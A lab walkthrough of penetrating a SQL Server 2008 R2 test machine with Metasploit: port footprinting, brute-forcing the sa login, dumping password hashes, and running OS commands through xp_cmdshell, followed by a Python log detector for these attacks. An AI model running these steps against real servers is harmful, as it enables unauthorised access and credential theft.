Database Penetration Testing (SQL Server as the Example)
I. Lab Environment
Attacker machine:
Kali 2019-3
Target machine:
Windows 10 with SQL Server 2008 R2 installed (192.168.1.104)
II. Procedure
1. Footprinting SQL Server with Nmap
(1) Run a service detection scan against TCP port 1433 of the target to footprint its SQL Server instance
msf5 > db_nmap -sV -p 1433 192.168.1.104
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-05 08:41 EDT
[*] Nmap: Nmap scan report for 192.168.1.104
[*] Nmap: Host is up (0.011s latency).
[*] Nmap: PORT     STATE SERVICE  VERSION
[*] Nmap: 1433/tcp open  ms-sql-s Microsoft SQL Server 2008 R2 10.50.1600; RTM
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 7.08 seconds
msf5 > services
Services
========

host           port  proto  name      state  info
----           ----  -----  ----      -----  ----
192.168.1.104  1433  tcp    ms-sql-s  open   Microsoft SQL Server 2008 R2 10.50.1600; RTM
(2) Service detection scan against UDP port 1434
msf5 > db_nmap -sU -sV -p 1434 192.168.1.104
……
(3) Use the Nmap ms-sql-info script to retrieve information about the target database
msf5 > db_nmap -sU --script=ms-sql-info -p 1434 192.168.1.104
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-05 08:56 EDT
[*] Nmap: Nmap scan report for 192.168.1.104
[*] Nmap: Host is up (0.00087s latency).
[*] Nmap: PORT     STATE         SERVICE
[*] Nmap: 1434/udp open|filtered ms-sql-m
[*] Nmap: Host script results:
[*] Nmap: | ms-sql-info:
[*] Nmap: |   192.168.1.104:1433:
[*] Nmap: |     Version:
[*] Nmap: |       name: Microsoft SQL Server 2008 R2 RTM
[*] Nmap: |       number: 10.50.1600.00
[*] Nmap: |       Product: Microsoft SQL Server 2008 R2
[*] Nmap: |       Service pack level: RTM
[*] Nmap: |       Post-SP patches applied: false
[*] Nmap: |_    TCP port: 1433
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 5.71 seconds
msf5 > db_nmap -sT --script=ms-sql-info -p 1433 192.168.1.104
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-05 08:59 EDT
[*] Nmap: Nmap scan report for 192.168.1.104
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 1433/tcp open  ms-sql-s
[*] Nmap: Host script results:
[*] Nmap: | ms-sql-info:
[*] Nmap: |   192.168.1.104:1433:
[*] Nmap: |     Version:
[*] Nmap: |       name: Microsoft SQL Server 2008 R2 RTM
[*] Nmap: |       number: 10.50.1600.00
[*] Nmap: |       Product: Microsoft SQL Server 2008 R2
[*] Nmap: |       Service pack level: RTM
[*] Nmap: |       Post-SP patches applied: false
[*] Nmap: |_    TCP port: 1433
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 5.26 seconds
2. Brute-forcing the password
The corresponding module is auxiliary/scanner/mssql/mssql_login. Set the wordlist options as the module's descriptions indicate and run it.
Example:
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BLANK_PASSWORDS      false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false            no        Add all passwords in the current database to the list
   DB_ALL_USERS         false            no        Add all users in the current database to the list
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   RHOSTS                                yes       The target address range or CIDR identifier
   RPORT                1433             yes       The target port (TCP)
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads
   USERNAME                              no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false            no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
   VERBOSE              true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.1.104
rhosts => 192.168.1.104
msf5 auxiliary(scanner/mssql/mssql_login) > set username sa    # the default account name is almost always sa
username => sa
msf5 auxiliary(scanner/mssql/mssql_login) > set password 123456    # taking a shortcut here; normally you would point PASS_FILE at a password wordlist
password => 123456
msf5 auxiliary(scanner/mssql/mssql_login) > set threads 10    # number of threads
threads => 10
msf5 auxiliary(scanner/mssql/mssql_login) > run
[*] 192.168.1.104:1433 - 192.168.1.104:1433 - MSSQL - Starting authentication scanner.
[+] 192.168.1.104:1433 - 192.168.1.104:1433 - Login Successful: WORKSTATION\sa:123456
[*] 192.168.1.104:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
3. Capturing the server's password hashes
Corresponding module: auxiliary/scanner/mssql/mssql_hashdump. The procedure is as follows:
msf5 > use auxiliary/scanner/mssql/mssql_hashdump
msf5 auxiliary(scanner/mssql/mssql_hashdump) > show options

Module options (auxiliary/scanner/mssql/mssql_hashdump):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target address range or CIDR identifier
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf5 auxiliary(scanner/mssql/mssql_hashdump) > set rhosts 192.168.1.104
rhosts => 192.168.1.104
msf5 auxiliary(scanner/mssql/mssql_hashdump) > set password 123456
password => 123456
msf5 auxiliary(scanner/mssql/mssql_hashdump) > set threads 10
threads => 10
msf5 auxiliary(scanner/mssql/mssql_hashdump) > run
[*] 192.168.1.104:1433 - Instance Name: nil
[+] 192.168.1.104:1433 - Saving mssql05 = sa:0100daf63……
[+] 192.168.1.104:1433 - Saving mssql05 = ##MS_PolicyEventProcessingLogin##:0100a8df1bd75……
[+] 192.168.1.104:1433 - Saving mssql05 = ##MS_PolicyTsqlExecutionLogin##:0100b5e6b……
[+] 192.168.1.104:1433 - Saving mssql05 = admin:0100f72e3d144e12782……
[+] 192.168.1.104:1433 - Saving mssql05 = coach:010060e……
[+] 192.168.1.104:1433 - Saving mssql05 = student:01004ac65……
[*] 192.168.1.104:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/mssql/mssql_hashdump) >
- Third-party tools can be used to crack these hashes.
4. Browsing the SQL Server
Using the target database credentials already obtained, log in to the server and collect important information from the database, such as stored procedures, the number and names of databases, the Windows groups that can log in to the database, the database files, and some configuration parameters.
Corresponding module: auxiliary/admin/mssql/mssql_enum. The procedure is as follows (the output after run is abridged):
msf5 > use auxiliary/admin/mssql/mssql_enum
msf5 auxiliary(admin/mssql/mssql_enum) > show options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target address range or CIDR identifier
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf5 auxiliary(admin/mssql/mssql_enum) > set password 123456
password => 123456
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts 192.168.1.104
rhosts => 192.168.1.104
msf5 auxiliary(admin/mssql/mssql_enum) > run
[*] Running module against 192.168.1.104
[*] 192.168.1.104:1433 - Running MS SQL Server Enumeration...
[*] 192.168.1.104:1433 - Version:
[*]     Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
[*]     Apr  2 2010 15:48:46
[*]     Copyright (c) Microsoft Corporation
[*]     Enterprise Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: )
[*] 192.168.1.104:1433 - Configuration Parameters:
[*] 192.168.1.104:1433 -     C2 Audit Mode is Not Enabled
[*] 192.168.1.104:1433 -     xp_cmdshell is Enabled
[*] 192.168.1.104:1433 -     remote access is Enabled
[*] 192.168.1.104:1433 -     allow updates is Not Enabled
[*] 192.168.1.104:1433 -     Database Mail XPs is Not Enabled
[*] 192.168.1.104:1433 -     Ole Automation Procedures are Not Enabled
[*] 192.168.1.104:1433 - Databases on the server:
[*] 192.168.1.104:1433 -     Database name:master
[*] 192.168.1.104:1433 -     Database Files for master:
[*] 192.168.1.104:1433 -         D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\master.mdf
[*] 192.168.1.104:1433 -         D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
[*] 192.168.1.104:1433 -     Database name:tempdb
[*] 192.168.1.104:1433 -     Database Files for tempdb:
[*] 192.168.1.104:1433 -         D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
[*] 192.168.1.104:1433 -         D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\templog.ldf
…………
[*] 192.168.1.104:1433 - System Logins on this Server:
[*] 192.168.1.104:1433 -     sa
[*] 192.168.1.104:1433 -     ##MS_SQLResourceSigningCertificate##
…………
[*] 192.168.1.104:1433 -     coach
[*] 192.168.1.104:1433 -     student
[*] 192.168.1.104:1433 - Disabled Accounts:
[*] 192.168.1.104:1433 -     ##MS_PolicyEventProcessingLogin##
[*] 192.168.1.104:1433 -     ##MS_PolicyTsqlExecutionLogin##
[*] 192.168.1.104:1433 - No Accounts Policy is set for:
[*] 192.168.1.104:1433 -     All System Accounts have the Windows Account Policy Applied to them.
[*] 192.168.1.104:1433 - Password Expiration is not checked for:
[*] 192.168.1.104:1433 -     sa
…………
[*] 192.168.1.104:1433 -     coach
[*] 192.168.1.104:1433 -     student
[*] 192.168.1.104:1433 - Windows Logins on this Server:
[*] 192.168.1.104:1433 -     NT AUTHORITY\SYSTEM
…………
[*] 192.168.1.104:1433 - Windows Groups that can logins on this Server:
[*] 192.168.1.104:1433 -     NT SERVICE\MSSQLSERVER
[*] 192.168.1.104:1433 -     NT SERVICE\SQLSERVERAGENT
[*] 192.168.1.104:1433 - Accounts with Username and Password being the same:
[*] 192.168.1.104:1433 -     No Account with its password being the same as its username was found.
[*] 192.168.1.104:1433 - Accounts with empty password:
[*] 192.168.1.104:1433 -     No Accounts with empty passwords where found.
[*] 192.168.1.104:1433 - Stored Procedures with Public Execute Permission found:
[*] 192.168.1.104:1433 -     sp_replsetsyncstatus
[*] 192.168.1.104:1433 -     sp_replcounters
[*] 192.168.1.104:1433 -     sp_replsendtoqueue
[*] 192.168.1.104:1433 -     sp_resyncexecutesql
[*] 192.168.1.104:1433 -     MSSQLSERVER
[*] 192.168.1.104:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 192.168.1.104:1433 -     NT AUTHORITY\NETWORKSERVICE
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) >
- Look carefully at the output; it yields a lot of useful information.
5. Post-exploitation / executing system commands
(1) Corresponding modules
The first module to use is mssql_exec, which can re-enable a disabled xp_cmdshell and thereby allow system-level commands to be executed.
The second module to use is mssql_sql, with which SQL queries can be run on the database.
…………
(2) Re-enabling xp_cmdshell
The mssql_exec module runs system-level commands by re-enabling the disabled xp_cmdshell feature. The module requires the CMD option to be set to the system command to execute.
Example:
msf5 > use auxiliary/admin/mssql/mssql_exec
msf5 auxiliary(admin/mssql/mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting                       Required  Description
   ----                 ---------------                       --------  -----------
   CMD                  cmd.exe /c echo OWNED > C:\owned.exe  no        Command to execute
   PASSWORD                                                   no        The password for the specified username
   RHOSTS                                                     yes       The target address range or CIDR identifier
   RPORT                1433                                  yes       The target port (TCP)
   TDSENCRYPTION        false                                 yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa                                    no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false                                 yes       Use windows authentification (requires DOMAIN option set)

msf5 auxiliary(admin/mssql/mssql_exec) > set rhosts 192.168.1.104
rhosts => 192.168.1.104
msf5 auxiliary(admin/mssql/mssql_exec) > set password 123456
password => 123456
msf5 auxiliary(admin/mssql/mssql_exec) > set cmd 'ipconfig'
cmd => ipconfig
msf5 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against 192.168.1.104
[*] 192.168.1.104:1433 - SQL Query: EXEC master..xp_cmdshell 'ipconfig'

 output
 ------

 Windows IP 配置

 无线局域网适配器 本地连接* 3:

    媒体状态  . . . . . . . . . . . . : 媒体已断开连接
    连接特定的 DNS 后缀 . . . . . . . :

 无线局域网适配器 本地连接* 4:

    媒体状态  . . . . . . . . . . . . : 媒体已断开连接
    连接特定的 DNS 后缀 . . . . . . . :

 以太网适配器 VMware Network Adapter VMnet1:

    连接特定的 DNS 后缀 . . . . . . . :
    本地链接 IPv6 地址. . . . . . . . : fe80::b5b6:426f:907c:7d60%5
    IPv4 地址 . . . . . . . . . . . . : 192.168.10.1
    子网掩码  . . . . . . . . . . . . : 255.255.255.0
    默认网关. . . . . . . . . . . . . :

 以太网适配器 VMware Network Adapter VMnet8:

    连接特定的 DNS 后缀 . . . . . . . :
    本地链接 IPv6 地址. . . . . . . . : fe80::d9b4:73e0:7e23:87df%8
    IPv4 地址 . . . . . . . . . . . . : 10.10.10.1
    子网掩码  . . . . . . . . . . . . : 255.255.255.0
    默认网关. . . . . . . . . . . . . :

 无线局域网适配器 WLAN:

    连接特定的 DNS 后缀 . . . . . . . :
    本地链接 IPv6 地址. . . . . . . . : fe80::6941:409f:25c4:4914%14
    IPv4 地址 . . . . . . . . . . . . : 192.168.1.104
    子网掩码  . . . . . . . . . . . . : 255.255.255.0
    默认网关. . . . . . . . . . . . . : 192.168.1.1

 以太网适配器 以太网 3:

    媒体状态  . . . . . . . . . . . . : 媒体已断开连接
    连接特定的 DNS 后缀 . . . . . . . :

[*] Auxiliary module execution completed
Note: if security software is installed on the target system, some commands will be blocked; for example, net user was blocked by 360.
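From the defender's side, the two activities above leave distinctive traces in the SQL Server ERRORLOG: the mssql_login run in section 2 produces a burst of error 18456 failures for sa from one client followed by a success, and re-enabling xp_cmdshell (section 5, also reported by mssql_enum in section 4) writes a "Configuration option 'xp_cmdshell' changed from 0 to 1" line. The detector below is an added example, not code from the original post or from Metasploit; the log excerpt is constructed, and the thresholds and the list of risky options are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed SQL Server ERRORLOG excerpt (not from the original post); the message
# formats follow what SQL Server writes for error 18456 and for sp_configure changes.
SAMPLE_ERRORLOG = """\
2021-10-05 08:41:02.11 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.100]
2021-10-05 08:41:02.35 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.100]
2021-10-05 08:41:02.58 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.100]
2021-10-05 08:41:02.80 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.100]
2021-10-05 08:41:03.25 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.1.100]
2021-10-05 09:10:41.90 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-10-05 11:00:00.00 Logon       Login failed for user 'student'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+)\s+(.*)$")
LOGIN_RE = re.compile(r"Login (failed|succeeded) for user '([^']*)'.*\[CLIENT: ([^\]]+)\]")
CONFIG_RE = re.compile(r"Configuration option '([^']+)' changed from \d+ to (\d+)")
# Options that mssql_enum reports and that an attacker holding sa can switch on (assumed list).
RISKY_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "remote access"}

def parse(text):
    # Yield (timestamp, source, message) for each well-formed ERRORLOG line.
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m.group(2), m.group(3)

def detect(text, threshold=4, window=timedelta(seconds=60)):
    # Returns alerts: login bursts per (client, login) and risky option changes.
    alerts = []
    failures = defaultdict(list)  # (client, login) -> failure timestamps inside the window
    for ts, src, msg in parse(text):
        lm = LOGIN_RE.search(msg)
        if lm:
            outcome, login, client = lm.groups()
            key = (client, login)
            failures[key] = [t for t in failures[key] if ts - t <= window]  # slide the window
            if outcome == "failed":
                failures[key].append(ts)
                if len(failures[key]) == threshold:  # fire once when the burst reaches the threshold
                    alerts.append(("bruteforce", client, login))
            elif failures[key]:  # success right after a burst of failures: the mssql_login success case
                alerts.append(("success_after_failures", client, login))
            continue
        cm = CONFIG_RE.search(msg)
        if cm and cm.group(1) in RISKY_OPTIONS and cm.group(2) == "1":
            alerts.append(("risky_option_enabled", cm.group(1), src))
    return alerts
```

On a real instance the same logic applies to the ERRORLOG files under the instance's Log directory, or to the equivalent Windows Application log events; a single failure for student does not trip the threshold, which is the point of counting per client and login.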
(3) Running SQL queries
The mssql_sql module can be used to execute SQL queries against the target database server. Just set the SQL option to a valid database query and it will be executed.
Querying the database version as an example:
msf5 > use auxiliary/admin/mssql/mssql_sql
msf5 auxiliary(admin/mssql/mssql_sql) > show options

Module options (auxiliary/admin/mssql/mssql_sql):

   Name                 Current Setting   Required  Description
   ----                 ---------------   --------  -----------
   PASSWORD                               no        The password for the specified username
   RHOSTS                                 yes       The target address range or CIDR identifier
   RPORT                1433              yes       The target port (TCP)
   SQL                  select @@version  no        The SQL query to execute
   TDSENCRYPTION        false             yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa                no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false             yes       Use windows authentification (requires DOMAIN option set)

msf5 auxiliary(admin/mssql/mssql_sql) > set rhosts 192.168.1.104
rhosts => 192.168.1.104
msf5 auxiliary(admin/mssql/mssql_sql) > set password 123456
password => 123456
msf5 auxiliary(admin/mssql/mssql_sql) > run
[*] Running module against 192.168.1.104
[*] 192.168.1.104:1433 - SQL Query: select @@version
[*] 192.168.1.104:1433 - Row Count: 1 (Status: 16 Command: 193)

 NULL
 ----
 Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
 Apr  2 2010 15:48:46
 Copyright (c) Microsoft Corporation
 Enterprise Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: )

[*] Auxiliary module execution completed
III. References
《精通Metasploit渗透测试》 (the Chinese edition of Mastering Metasploit)